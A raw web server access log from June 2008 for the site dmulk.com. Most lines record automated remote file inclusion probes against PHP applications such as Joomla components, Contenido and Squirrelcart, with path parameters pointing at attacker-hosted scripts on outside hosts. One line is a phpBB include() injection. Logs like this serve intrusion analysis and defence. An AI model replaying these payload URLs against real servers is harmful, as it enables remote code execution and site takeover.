65.42.183.2 - - [17/Jun/2008:12:02:29 -0700] "GET /contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.proostjes.be/calendar/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.42.183.2 - - [17/Jun/2008:12:02:29 -0700] "GET /logs/contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.proostjes.be/calendar/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.42.183.2 - - [17/Jun/2008:12:02:33 -0700] "GET /logs/access_080117.log/contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.proostjes.be/calendar/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.42.183.2 - - [17/Jun/2008:12:02:33 -0700] "GET /contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.proostjes.be/calendar/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.42.183.2 - - [17/Jun/2008:12:02:36 -0700] "GET /logs/contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.proostjes.be/calendar/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.221.143.111 - - [17/Jun/2008:12:02:39 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.29.81.233 - - [17/Jun/2008:12:02:47 -0700] "GET /logs/access_080308.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "dmulk.com"
72.29.81.233 - - [17/Jun/2008:12:02:47 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "dmulk.com"
213.219.217.74 - - [17/Jun/2008:12:02:50 -0700] "GET /logs/access_080507.log/errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.219.217.74 - - [17/Jun/2008:12:02:51 -0700] "GET /errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.219.217.74 - - [17/Jun/2008:12:02:51 -0700] "GET /logs/errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.219.217.74 - - [17/Jun/2008:12:02:52 -0700] "GET /errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.221.143.111 - - [17/Jun/2008:12:03:35 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:12:04:00 -0700] "GET /logs/access_071230.log/popup_window.php?site_isp_root=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:12:04:01 -0700] "GET /popup_window.php?site_isp_root=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:12:04:01 -0700] "GET /logs/popup_window.php?site_isp_root=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
202.221.143.111 - - [17/Jun/2008:12:04:02 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.221.143.111 - - [17/Jun/2008:12:04:02 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:12:04:13 -0700] "GET /logs/access_071230.log///squirrelcart/cart_content.php?cart_isp_root=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:12:04:13 -0700] "GET ///squirrelcart/cart_content.php?cart_isp_root=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:12:04:20 -0700] "GET /logs///squirrelcart/cart_content.php?cart_isp_root=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.98.224.22 - - [17/Jun/2008:12:04:42 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://metromini.freetzi.com/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
66.98.224.22 - - [17/Jun/2008:12:04:43 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://metromini.freetzi.com/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:12:05:11 -0700] "GET /logs/access_080215.log/popup_window.php?site_isp_root=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
75.63.85.187 - - [17/Jun/2008:12:05:16 -0700] "GET /logs/access_080218.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.bk2k.com/img/g2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.63.85.187 - - [17/Jun/2008:12:05:16 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.bk2k.com/img/g2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.63.85.187 - - [17/Jun/2008:12:05:16 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.bk2k.com/img/g2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:12:05:21 -0700] "GET /logs/access_080215.log///squirrelcart/cart_content.php?cart_isp_root=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
65.42.183.2 - - [17/Jun/2008:12:05:38 -0700] "GET /logs/access_080215.log/contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.proostjes.be/calendar/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.42.183.2 - - [17/Jun/2008:12:05:40 -0700] "GET /logs/access_080215.log/contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.proostjes.be/calendar/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.15.114.74 - - [17/Jun/2008:12:05:56 -0700] "GET /logs/access.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.fingerxs.eu/modules/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.114.74 - - [17/Jun/2008:12:05:57 -0700] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.fingerxs.eu/modules/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.114.74 - - [17/Jun/2008:12:05:58 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.fingerxs.eu/modules/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.114.74 - - [17/Jun/2008:12:06:18 -0700] "GET /logs/access_080201.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.fingerxs.eu/modules/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.12.53.176 - - [17/Jun/2008:12:06:19 -0700] "GET /logs/access_080313.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://nicosahputra.ueuo.com/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [17/Jun/2008:12:06:19 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://nicosahputra.ueuo.com/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [17/Jun/2008:12:06:33 -0700] "GET /logs/access_080228.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://nicosahputra.ueuo.com/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.42.183.2 - - [17/Jun/2008:12:07:11 -0700] "GET /logs/access_080215.log/contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.proostjes.be/calendar/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.42.183.2 - - [17/Jun/2008:12:07:11 -0700] "GET /contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.proostjes.be/calendar/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.42.183.2 - - [17/Jun/2008:12:07:11 -0700] "GET /logs/contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.proostjes.be/calendar/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.42.183.2 - - [17/Jun/2008:12:07:15 -0700] "GET /logs/access_080215.log/contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.proostjes.be/calendar/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.42.183.2 - - [17/Jun/2008:12:07:15 -0700] "GET /contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.proostjes.be/calendar/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.42.183.2 - - [17/Jun/2008:12:07:15 -0700] "GET /logs/contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.proostjes.be/calendar/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.63.85.187 - - [17/Jun/2008:12:07:19 -0700] "GET /logs/access_080126.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.bk2k.com/img/g2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
75.63.85.187 - - [17/Jun/2008:12:07:19 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.bk2k.com/img/g2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
75.63.85.187 - - [17/Jun/2008:12:07:19 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.bk2k.com/img/g2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
69.152.91.208 - - [17/Jun/2008:12:07:33 -0700] "GET /blog/index.php/2008/04/03/hello-world/trackback HTTP/1.1" 200 6911 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "dmulk.com"
67.195.37.180 - - [17/Jun/2008:12:08:24 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.37.180 - - [17/Jun/2008:12:08:25 -0700] "GET /logs/access_071212.log HTTP/1.0" 200 89527 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.55.179.18 - - [17/Jun/2008:12:08:33 -0700] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.fc13.fr/ultrastats/include/help.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
72.55.179.18 - - [17/Jun/2008:12:08:33 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.fc13.fr/ultrastats/include/help.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
80.190.202.198 - - [17/Jun/2008:12:08:46 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.youthsoroca.md/php-nuke/foto/safe.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.232.188 - - [17/Jun/2008:12:08:54 -0700] "GET /logs/access_080429.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.informatizados.es/docs/info/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.225.221.84 - - [17/Jun/2008:12:08:57 -0700] "GET /logs/access_080313.log/components/com_performs/performs.php?mosConfig_absolute_path=http://bucetinha.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.225.221.84 - - [17/Jun/2008:12:08:58 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://bucetinha.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.225.221.84 - - [17/Jun/2008:12:08:58 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://bucetinha.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.96.205 - - [17/Jun/2008:12:09:14 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_phpshop&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.somosvialibre.org/.bash_tmp?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
67.205.96.205 - - [17/Jun/2008:12:09:14 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_phpshop&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.somosvialibre.org/.bash_tmp?? HTTP/1.1" 200 50 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
213.219.217.74 - - [17/Jun/2008:12:09:30 -0700] "GET /logs/access_080507.log/errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.219.217.74 - - [17/Jun/2008:12:09:31 -0700] "GET /errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.219.217.74 - - [17/Jun/2008:12:09:31 -0700] "GET /logs/errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.28.163 - - [17/Jun/2008:12:09:44 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.54.28.163 - - [17/Jun/2008:12:09:50 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.53.194 - - [17/Jun/2008:12:10:08 -0700] "GET /logs/main.php?page=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.53.194 - - [17/Jun/2008:12:10:08 -0700] "GET /logs/main.php?page=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.53.194 - - [17/Jun/2008:12:10:09 -0700] "GET /main.php?page=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.53.194 - - [17/Jun/2008:12:10:09 -0700] "GET /main.php?page=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:12:10:39 -0700] "GET /logs/access_080326.log//common/db.php?commonpath=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:12:10:40 -0700] "GET //common/db.php?commonpath=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:12:10:41 -0700] "GET /logs//common/db.php?commonpath=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
210.48.67.39 - - [17/Jun/2008:12:11:29 -0700] "GET /logs/access_080228.log/test.php?page=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.67.39 - - [17/Jun/2008:12:11:30 -0700] "GET /test.php?page=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.67.39 - - [17/Jun/2008:12:11:30 -0700] "GET /logs/test.php?page=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.67.39 - - [17/Jun/2008:12:11:46 -0700] "GET /logs/access_080211.log/test.php?page=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.69.204.75 - - [17/Jun/2008:12:12:21 -0700] "GET /logs//contenido/cronjobs/error.php?error=http://www.szurotrade.hu/menv.php/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.73" "www.dmulk.com"
212.69.204.75 - - [17/Jun/2008:12:12:22 -0700] "GET //contenido/cronjobs/error.php?error=http://www.szurotrade.hu/menv.php/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.73" "www.dmulk.com"
213.219.217.74 - - [17/Jun/2008:12:12:23 -0700] "GET /logs/access_080330.log/errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.249.73.161 - - [17/Jun/2008:12:12:39 -0700] "GET /?show=gallery&pageid=17&nggpage=2 HTTP/1.1" 200 54388 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
75.63.85.187 - - [17/Jun/2008:12:12:41 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.bk2k.com/img/g2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.54.28.163 - - [17/Jun/2008:12:12:59 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.54.28.163 - - [17/Jun/2008:12:13:04 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.92.219.130 - - [17/Jun/2008:12:13:21 -0700] "GET /logs/index2.php?p=http://skill-station.net/help/id5.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
81.92.219.130 - - [17/Jun/2008:12:13:21 -0700] "GET /logs/access_080216.log/index2.php?p=http://skill-station.net/help/id5.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
81.92.219.130 - - [17/Jun/2008:12:13:21 -0700] "GET /index2.php?p=http://skill-station.net/help/id5.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
81.92.219.130 - - [17/Jun/2008:12:13:21 -0700] "GET /logs/access_080131.log/index2.php?p=http://skill-station.net/help/id5.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:12:13:24 -0700] "GET /logs/access_080325.log//common/db.php?commonpath=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.67.119 - - [17/Jun/2008:12:13:33 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.bicarabuku.com/mambots/system/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.119 - - [17/Jun/2008:12:13:37 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.bicarabuku.com/mambots/system/sql.txt? HTTP/1.1" 200 18533 "-" "libwww-perl/5.805" "www.dmulk.com"
212.69.204.75 - - [17/Jun/2008:12:13:57 -0700] "GET /logs/access_071228.log//contenido/cronjobs/error.php?error=http://www.szurotrade.hu/menv.php/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.73" "www.dmulk.com"
212.69.204.75 - - [17/Jun/2008:12:13:57 -0700] "GET //contenido/cronjobs/error.php?error=http://www.szurotrade.hu/menv.php/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.73" "www.dmulk.com"
212.69.204.75 - - [17/Jun/2008:12:13:57 -0700] "GET /logs//contenido/cronjobs/error.php?error=http://www.szurotrade.hu/menv.php/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.73" "www.dmulk.com"
212.69.204.75 - - [17/Jun/2008:12:14:07 -0700] "GET /logs/access_080124.log//contenido/cronjobs/error.php?error=http://www.szurotrade.hu/menv.php/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.73" "www.dmulk.com"
200.26.142.244 - - [17/Jun/2008:12:14:25 -0700] "GET /errors.php?error=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.195.72.156 - - [17/Jun/2008:12:15:31 -0700] "GET /logs/access_080330.log/errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.195.72.156 - - [17/Jun/2008:12:15:32 -0700] "GET /errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.195.72.156 - - [17/Jun/2008:12:15:32 -0700] "GET /logs/errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.219.217.74 - - [17/Jun/2008:12:15:35 -0700] "GET /logs/access_080215.log/errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.219.217.74 - - [17/Jun/2008:12:15:36 -0700] "GET /errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.219.217.74 - - [17/Jun/2008:12:15:36 -0700] "GET /logs/errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.195.72.156 - - [17/Jun/2008:12:15:39 -0700] "GET /logs/access_080507.log/errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.53.194 - - [17/Jun/2008:12:15:43 -0700] "GET /logs/access_080312.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.11.24.250 - - [17/Jun/2008:12:15:43 -0700] "GET /logs/access.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.destarre.be/media/jenggot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.53.194 - - [17/Jun/2008:12:15:43 -0700] "GET /logs/access_080312.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.11.24.250 - - [17/Jun/2008:12:15:44 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.destarre.be/media/jenggot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.53.194 - - [17/Jun/2008:12:15:44 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.53.194 - - [17/Jun/2008:12:15:44 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.0.200.170 - - [17/Jun/2008:12:15:56 -0700] "GET /logs/access_080429.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://http://www.freewebtown.com/scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.225.221.84 - - [17/Jun/2008:12:17:29 -0700] "GET /logs/access_080221.log/components/com_performs/performs.php?mosConfig_absolute_path=http://bucetinha.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.51.98 - - [17/Jun/2008:12:17:37 -0700] "GET /blog/index.php/2008/04/ HTTP/1.0" 200 10271 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
85.119.244.16 - - [17/Jun/2008:12:17:46 -0700] "GET /errors.php?error=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.8.96 - - [17/Jun/2008:12:17:53 -0700] "GET / HTTP/1.0" 200 18241 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.18.228 - - [17/Jun/2008:12:17:56 -0700] "GET / HTTP/1.0" 200 18225 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.190.202.198 - - [17/Jun/2008:12:19:17 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.youthsoroca.md/php-nuke/foto/safe.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.119.244.16 - - [17/Jun/2008:12:19:25 -0700] "GET /errors.php?error=http://www.starfish.gr/LICENSE.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.0.200.170 - - [17/Jun/2008:12:19:55 -0700] "GET /logs/access_080429.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://http://www.freewebtown.com/scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.119.244.16 - - [17/Jun/2008:12:20:33 -0700] "GET /errors.php?error=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.100.220.56 - - [17/Jun/2008:12:20:53 -0700] "GET /logs//ashnews.php?pathtoashnews=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.100.220.56 - - [17/Jun/2008:12:20:53 -0700] "GET //ashnews.php?pathtoashnews=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
